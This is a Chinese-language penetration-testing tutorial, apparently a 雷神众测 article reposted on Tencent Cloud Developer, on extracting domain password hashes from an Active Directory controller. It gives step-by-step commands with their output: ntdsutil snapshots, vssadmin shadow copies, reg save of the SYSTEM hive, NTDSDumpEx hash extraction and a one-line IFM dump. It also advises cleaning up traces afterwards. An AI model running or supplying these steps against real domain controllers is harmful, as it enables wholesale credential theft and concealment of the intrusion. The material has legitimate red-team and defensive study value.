转储域密码哈希值
No.1
声明
由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,雷神众测以及文章作者不为此承担任何责任。 雷神众测拥有对此文章的修改和解释权。如欲转载或传播此文章,必须保证此文章的完整性,包括版权声明等全部内容。未经雷神众测允许,不得任意修改或者增减此文章内容,不得以任何方式将其用于商业目的。
No.2
前言
域用户的哈希值存储在域管服务器的NTDS.DIT的数据库文件中,除此之外还有用户信息和组成员信息。NTDS.dit文件无法直接复制到其他位置进行离线破解和提取(类似于本地存储的SYSTEM),其存储位置为:
C:\Windows\NTDS\NTDS.dit
本文主要介绍利用域管理服务器命令提取NTDS.dit文件,后续还会有其他工具的使用方法。
No.3
Ntdsutil快照
该工具域环境默认安装[Windows 2003 及以上]
查看当前快照列表
C:\Users\Administrator>ntdsutil snapshot "list all" quit quitntdsutil: snapshot快照: list all
找不到快照。
快照: quit
ntdsutil: quit
创建快照
C:\Users\Administrator>ntdsutil snapshot "activate instance ntds" create quit quitntdsutil: snapshot
快照: activate instance ntds
活动实例设置为“ntds”。
快照: create
正在创建快照...
成功生成快照集 {550f5e34-1952-475b-99ef-30ba80014363}。
快照: quit
ntdsutil
注:其中快照的guid需要取出来,挂载快照时使用
挂载快照
C:\Users\Administrator>ntdsutil snapshot "mount {550f5e34-1952-475b-99ef-30ba80014363}" quit quit
ntdsutil: snapshot
快照: mount {550f5e34-1952-475b-99ef-30ba80014363}快照 {b38c1255-073f-4124-a32f-75144555c3fd}
已作为 C:\$SNAP_201810172200_VOLUMEC$\ 装载快照: quit
ntdsutil: quit
注:机器中有几块硬盘,那么就会生成几个快照分区,快照分区会以$SNAP_时间_VOLUME{分区名}$进行命名
寻找ntds.dit
一般情况下会在c:\windows\ntds\ 目录下
注:注意看时间,一定要最近日期的,有一些域控机器上的ntds.dit很古老,那么可能是备份到其他目录下了,需要再找一下,可能…还会遇到磁盘空间不足的情况,自行斟酌。
拷贝ntds.dit
C:\Users\Administrator>copy C:\$SNAP_201810172200_VOLUMEC$\Windows\NTDS\ntds.dit c:\windows\temp\
已复制 1 个文件。
卸载快照
C:\Users\Administrator>ntdsutil snapshot "unmount {550f5e34-1952-475b-99ef-30ba80014363}" quit quit
ntdsutil: snapshot
快照: unmount {550f5e34-1952-475b-99ef-30ba80014363}
快照 {b38c1255-073f-4124-a32f-75144555c3fd} 已卸载。
快照: quit
ntdsutil: quit
删除快照
C:\Users\Administrator>ntdsutil snapshot "delete {550f5e34-1952-475b-99ef-30ba80014363}" quit quit
ntdsutil: snapshot
快照: delete {550f5e34-1952-475b-99ef-30ba80014363}快照 {b38c1255-073f-4124-a32f-75144555c3fd} 已删除。
快照: quit
ntdsutil: quit
获取注册表中的system文件
C:\Users\Administrator>reg save HKLM\SYSTEM c:\windows\temp\system.hiv
操作成功完成。
通过NtdsDumpex.exe提取域用户hash
C:\Users\Administrator>c:\windows\temp\NTDSDumpEx.exe -d c:\windows\temp\ntds.dit -s c:\windows\temp\system.hiv -o c:\windows\temp\hash.txt -hntds.dit hashes off-line dumper v0.3.Part of GMH's fuck Tools,Code by zcgonvh.
[+]use hive file: c:\windows\temp\system.hiv
[+]SYSKEY = 09135AC2D70C07F0984CF71599F7D947
[+]PEK version: 2k3
[+]PEK = 57C4CDE20126F6BE8B6FFE5649178339
[+]dump completed in 0.172 seconds.
注:这里hash.txt就是我们想要的用户hash
拷贝hash
全部结束之后记得清理现场
小福利:一句话版本
ntdsutil "ac in ntds" "ifm" "cr fu c:\windows\temp\temp\" q q
No.4
VSSADMIN卷影副本
卷影副本是Windows命令行一种即便被操作系统使用也能够用于管理员备份计算机,卷,文件的实用程序。卷影复制作为服务运行,并要求将文件系统格式化为NTFS,默认情况在所有现代操作系统下都是如此。从Windows命令提示符执行以下操作将创建C:驱动器盘的快照,以便用户访问通常无法访问这些文件,并将其其复制到另一个位置(本地文件夹,网络文件夹或可移动介质)。
注:要有管理员权限
查看卷影列表:
C:\Users\Administrator>vssadmin list shadowsvssadmin 1.1 - 卷影复制服务管理命令行工具(C) 版权所有 2001-2005 Microsoft Corp. 卷影副本集 ID: {9ddcbac4-00c2-4383-add4-abb96e190399} 的内容
在创建时间: 2018/9/7 22:48:01 含有 1 个卷影副本 卷影副本 ID: {e32bb2a2-5033-40cf-9892-5b49d6f5611c}
原始卷: (C:)\\?\Volume{f73dd843-9b04-11e8-99c6-806e6f6e6963}\
卷影副本卷: \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1 源起机器: WIN-1O417SEMSD5.test.com
服务机器: WIN-1O417SEMSD5.test.com
提供程序: 'Microsoft Software Shadow Copy provider 1.0'
类型: ClientAccessible
属性: 持续, 客户端可问
创建卷影列表:
C:\Users\Administrator>vssadmin create shadow /for=c:vssadmin 1.1 - 卷影复制服务管理命令行工具
(C) 版权所有 2001-2005 Microsoft Corp.
成功地创建了 'c:\' 的卷影副本
卷影副本 ID: {e32bb2a2-5033-40cf-9892-5b49d6f5611c}
卷影副本卷名: \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1
获取NDTS.dit和SYSTEM:
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\NTDS\NTDS.dit C:\temp\
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM C:\temp\
C:\Users\Administrator>copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\NTDS\NTDS.dit C:\temp\
已复制 1 个文件。
C:\Users\Administrator>copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM C:\temp\
已复制 1 文件。
删除卷影列表:
C:\Users\Administrator>vssadmin Delete Shadows /For=C:vssadmin 1.1 - 卷影复制服务管理命令行工具
(C) 版权所有 2001-2005 Microsoft Corp.
确实要删除 1 卷影副本吗(Y/N): [N]? Y
成功地删了
打包拷贝!Get
END
腾讯云开发者
